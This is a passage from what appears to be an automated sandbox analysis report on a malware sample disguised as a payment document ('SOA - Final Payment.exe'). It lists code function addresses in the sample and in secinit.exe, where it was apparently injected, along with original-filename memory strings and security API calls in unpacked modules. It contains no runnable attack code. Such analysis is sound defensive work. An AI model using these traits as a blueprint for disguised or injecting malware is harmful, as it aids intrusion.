                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_07928F580_2_07928F58
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0792CF700_2_0792CF70
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_07928F680_2_07928F68
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0792A6580_2_0792A658
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0792DDD00_2_0792DDD0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0792DDC20_2_0792DDC2
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0792E5F00_2_0792E5F0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0792E5E10_2_0792E5E1
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0792E3520_2_0792E352
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0792E3600_2_0792E360
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_07921A300_2_07921A30
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0792E1F00_2_0792E1F0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0792E1E00_2_0792E1E0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0792B0580_2_0792B058
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0B783B080_2_0B783B08
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0B7828700_2_0B782870
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0B7841E80_2_0B7841E8
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0B782B080_2_0B782B08
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0B782AF80_2_0B782AF8
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0B783AF80_2_0B783AF8
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0B7828600_2_0B782860
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0B782FB00_2_0B782FB0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0B782FA10_2_0B782FA1
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0B782D580_2_0B782D58
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0B782D490_2_0B782D49
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0B78DC700_2_0B78DC70
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0B78B3500_2_0B78B350
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0B7841D90_2_0B7841D9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0B7800400_2_0B780040
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0B78001F0_2_0B78001F
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0B78B7880_2_0B78B788
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0B7846B80_2_0B7846B8
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0B7846B20_2_0B7846B2
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00418B635_2_00418B63
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0042F1F35_2_0042F1F3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00402AE05_2_00402AE0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_004033C55_2_004033C5
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_004033D05_2_004033D0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_004103AA5_2_004103AA
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_004103B35_2_004103B3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00416D5E5_2_00416D5E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00416D635_2_00416D63
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0040E5C35_2_0040E5C3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_004105D35_2_004105D3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_004025825_2_00402582
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_004025905_2_00402590
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00402F405_2_00402F40
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0040E75C5_2_0040E75C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0040276A5_2_0040276A
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_004027705_2_00402770
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0040E7125_2_0040E712
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0040E7135_2_0040E713
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00402F3D5_2_00402F3D
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012701005_2_01270100
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131A1185_2_0131A118
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B516C5_2_012B516C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F1725_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0134B16B5_2_0134B16B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013081585_2_01308158
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128B1B05_2_0128B1B0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013401AA5_2_013401AA
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013381CC5_2_013381CC
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133F0E05_2_0133F0E0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013370E95_2_013370E9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C05_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132F0CC5_2_0132F0CC
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133132D5_2_0133132D
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133A3525_2_0133A352
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126D34C5_2_0126D34C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012C739A5_2_012C739A
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013403E65_2_013403E6
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128E3F05_2_0128E3F0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013202745_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012852A05_2_012852A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013212ED5_2_013212ED
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129B2C05_2_0129B2C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012805355_2_01280535
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013375715_2_01337571
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131D5B05_2_0131D5B0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013405915_2_01340591
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133F43F5_2_0133F43F
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012714605_2_01271460
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013324465_2_01332446
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132E4F65_2_0132E4F6
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012807705_2_01280770
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A47505_2_012A4750
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133F7B05_2_0133F7B0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127C7C05_2_0127C7C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129C6E05_2_0129C6E0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013316CC5_2_013316CC
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012969625_2_01296962
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012899505_2_01289950
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129B9505_2_0129B950
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012829A05_2_012829A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0134A9A65_2_0134A9A6
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012ED8005_2_012ED800
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012828405_2_01282840
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128A8405_2_0128A840
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012668B85_2_012668B8
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012838E05_2_012838E0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AE8F05_2_012AE8F0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133FB765_2_0133FB76
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133AB405_2_0133AB40
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129FB805_2_0129FB80
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012BDBF95_2_012BDBF9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F5BF05_2_012F5BF0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01336BD75_2_01336BD7
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F3A6C5_2_012F3A6C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01337A465_2_01337A46
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133FA495_2_0133FA49
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012C5AA05_2_012C5AA0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131DAAC5_2_0131DAAC
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127EA805_2_0127EA80
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132DAC65_2_0132DAC6
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128AD005_2_0128AD00
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01337D735_2_01337D73
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01283D405_2_01283D40
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01331D5A5_2_01331D5A
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01298DBF5_2_01298DBF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127ADE05_2_0127ADE0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129FDC05_2_0129FDC0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F9C325_2_012F9C32
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01280C005_2_01280C00
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320CB55_2_01320CB5
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133FCF25_2_0133FCF2
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01270CF25_2_01270CF2
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012C2F285_2_012C2F28
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A0F305_2_012A0F30
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133FF095_2_0133FF09
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F4F405_2_012F4F40
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133FFB15_2_0133FFB1
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012FEFA05_2_012FEFA0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281F925_2_01281F92
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128CFE05_2_0128CFE0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01272FC85_2_01272FC8
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133EE265_2_0133EE26
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01280E595_2_01280E59
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01289EB05_2_01289EB0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133CE935_2_0133CE93
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01292E905_2_01292E90
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133EEDB5_2_0133EEDB
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345A35210_2_0345A352
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_034603E610_2_034603E6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033AE3F010_2_033AE3F0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0344027410_2_03440274
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_034202C010_2_034202C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0342815810_2_03428158
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0339010010_2_03390100
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0343A11810_2_0343A118
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_034581CC10_2_034581CC
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_034601AA10_2_034601AA
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0343200010_2_03432000
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A077010_2_033A0770
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033C475010_2_033C4750
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0339C7C010_2_0339C7C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033BC6E010_2_033BC6E0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A053510_2_033A0535
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0346059110_2_03460591
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345244610_2_03452446
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0344442010_2_03444420
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0344E4F610_2_0344E4F6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345AB4010_2_0345AB40
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03456BD710_2_03456BD7
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0339EA8010_2_0339EA80
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033B696210_2_033B6962
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A29A010_2_033A29A0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0346A9A610_2_0346A9A6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033AA84010_2_033AA840
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A284010_2_033A2840
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033868B810_2_033868B8
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033CE8F010_2_033CE8F0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03414F4010_2_03414F40
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033C0F3010_2_033C0F30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033E2F2810_2_033E2F28
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03442F3010_2_03442F30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033ACFE010_2_033ACFE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0341EFA010_2_0341EFA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03392FC810_2_03392FC8
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345EE2610_2_0345EE26
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A0E5910_2_033A0E59
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345EEDB10_2_0345EEDB
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033B2E9010_2_033B2E90
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345CE9310_2_0345CE93
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033AAD0010_2_033AAD00
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0343CD1F10_2_0343CD1F
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033B8DBF10_2_033B8DBF
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0339ADE010_2_0339ADE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A0C0010_2_033A0C00
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03390CF210_2_03390CF2
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03440CB510_2_03440CB5
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345132D10_2_0345132D
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0338D34C10_2_0338D34C
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033E739A10_2_033E739A
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A52A010_2_033A52A0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_034412ED10_2_034412ED
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033BB2C010_2_033BB2C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0346B16B10_2_0346B16B
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0338F17210_2_0338F172
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D516C10_2_033D516C
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033AB1B010_2_033AB1B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0344F0CC10_2_0344F0CC
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345F0E010_2_0345F0E0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_034570E910_2_034570E9
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A70C010_2_033A70C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345F7B010_2_0345F7B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_034516CC10_2_034516CC
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345757110_2_03457571
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0343D5B010_2_0343D5B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0339146010_2_03391460
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345F43F10_2_0345F43F
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345FB7610_2_0345FB76
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03415BF010_2_03415BF0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033BFB8010_2_033BFB80
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033DDBF910_2_033DDBF9
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03457A4610_2_03457A46
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345FA4910_2_0345FA49
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03413A6C10_2_03413A6C
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0344DAC610_2_0344DAC6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033E5AA010_2_033E5AA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03441AA310_2_03441AA3
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0343DAAC10_2_0343DAAC
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0343591010_2_03435910
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A995010_2_033A9950
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033BB95010_2_033BB950
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0340D80010_2_0340D800
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A38E010_2_033A38E0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345FF0910_2_0345FF09
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A1F9210_2_033A1F92
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345FFB110_2_0345FFB1
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A9EB010_2_033A9EB0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03451D5A10_2_03451D5A
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03457D7310_2_03457D73
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A3D4010_2_033A3D40
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033BFDC010_2_033BFDC0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03419C3210_2_03419C32
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345FCF210_2_0345FCF2
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A61E9010_2_02A61E90
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A5AF6010_2_02A5AF60
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A5CF7010_2_02A5CF70
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A5CD4710_2_02A5CD47
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A5CD5010_2_02A5CD50
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A5B0AF10_2_02A5B0AF
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A5B0B010_2_02A5B0B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A5B0F910_2_02A5B0F9
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A636FB10_2_02A636FB
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A6370010_2_02A63700
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A6550010_2_02A65500
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A7BB9010_2_02A7BB90
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0318E2C310_2_0318E2C3
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0318E1A410_2_0318E1A4
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0318D72810_2_0318D728
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0318E65C10_2_0318E65C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: String function: 012EEA12 appears 86 times
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: String function: 0126B970 appears 268 times
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: String function: 012C7E54 appears 95 times
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: String function: 012FF290 appears 105 times
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: String function: 012B5130 appears 36 times
                Source: C:\Windows\SysWOW64\secinit.exeCode function: String function: 0341F290 appears 105 times
                Source: C:\Windows\SysWOW64\secinit.exeCode function: String function: 033E7E54 appears 101 times
                Source: C:\Windows\SysWOW64\secinit.exeCode function: String function: 033D5130 appears 58 times
                Source: C:\Windows\SysWOW64\secinit.exeCode function: String function: 0340EA12 appears 86 times
                Source: C:\Windows\SysWOW64\secinit.exeCode function: String function: 0338B970 appears 278 times
                Source: SOA - Final Payment.exe, 00000000.00000002.1380480533.000000000187E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SOA - Final Payment.exe
                Source: SOA - Final Payment.exe, 00000000.00000002.1389270028.000000000BE40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs SOA - Final Payment.exe
                Source: SOA - Final Payment.exe, 00000000.00000000.1358800501.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamegRvW.exe< vs SOA - Final Payment.exe
                Source: SOA - Final Payment.exe, 00000005.00000002.1731725620.000000000136D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SOA - Final Payment.exe
                Source: SOA - Final Payment.exe, 00000005.00000002.1731361843.0000000000D18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesecinitj% vs SOA - Final Payment.exe
                Source: SOA - Final Payment.exeBinary or memory string: OriginalFilenamegRvW.exe< vs SOA - Final Payment.exe
                Source: SOA - Final Payment.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: SOA - Final Payment.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, D10xcgnntUSUthDVjj.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, D10xcgnntUSUthDVjj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, D10xcgnntUSUthDVjj.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, a1PjpmmEEKL740qFJE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, a1PjpmmEEKL740qFJE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, D10xcgnntUSUthDVjj.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, D10xcgnntUSUthDVjj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, D10xcgnntUSUthDVjj.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, D10xcgnntUSUthDVjj.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, D10xcgnntUSUthDVjj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, D10xcgnntUSUthDVjj.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, a1PjpmmEEKL740qFJE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, a1PjpmmEEKL740qFJE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
